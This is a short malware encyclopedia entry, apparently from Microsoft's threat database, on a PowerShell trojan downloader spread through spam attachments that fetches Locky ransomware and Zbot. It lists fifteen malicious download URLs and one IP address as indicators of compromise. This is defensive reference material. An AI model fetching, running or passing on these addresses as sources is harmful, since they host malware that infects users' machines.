Home / malware TrojanDownloader:PowerShell/Ploprolo.A
First posted on 19 October 2016.
Source: MicrosoftAliases :
There are no other names known for TrojanDownloader:PowerShell/Ploprolo.A.
Explanation :
Installation
This threat is a detection for a malicious PowerShell script. When executed, it downloads and runs other malware into the system.
The malicious PowerShell scripts is usually embeded into other files such as .LNK, .CHM, .BAT, .PDF, .PPTX and can arrive in your PC as an attachment to a spam email. See some screenshots of sample spam emails below:
Payload
Connects to a remote host
We have observed the malicious PowerShell scripts download malicious files from:The downloaded file is then saved and executed on %TEMP% or %APPDATA% folder.
- 37.48.125.105/bin/gn.exe
- a.pomf.cat/kdwsuj.exe
- csecur.us/pm/mail.exe
- directexe.com/2D2A/bg.exe
- gonzallezbyass.es/adoread.exe
- herbalshapdco.com/cs16.exe
- info-api.ru/xxx/invoice.exe
- opportunityhy.bid/__files__/c.dat
- opportunityhy.bid/1.dat
- preparingjb.bid/user.php?f=1.dat
- slaughterwu.bid/user.php?f=1.dat
- temporaryv.bid/user.php?f=1.dat
- teolds.com/wp-content/plugins/libravatar-replace/scrwin.exe
- upload.ee/download/6191447/083c56c8207a106cfd10/vale.exe
- zippyshare.com/d/8hjAtabL/26263/Server.exe
Downloads and installs other malware
We have observed this threat download a variant of Ransom:Win32/Locky and other malware such as Win/Zbot.
Analysis by Ric RobielosLast update 19 October 2016
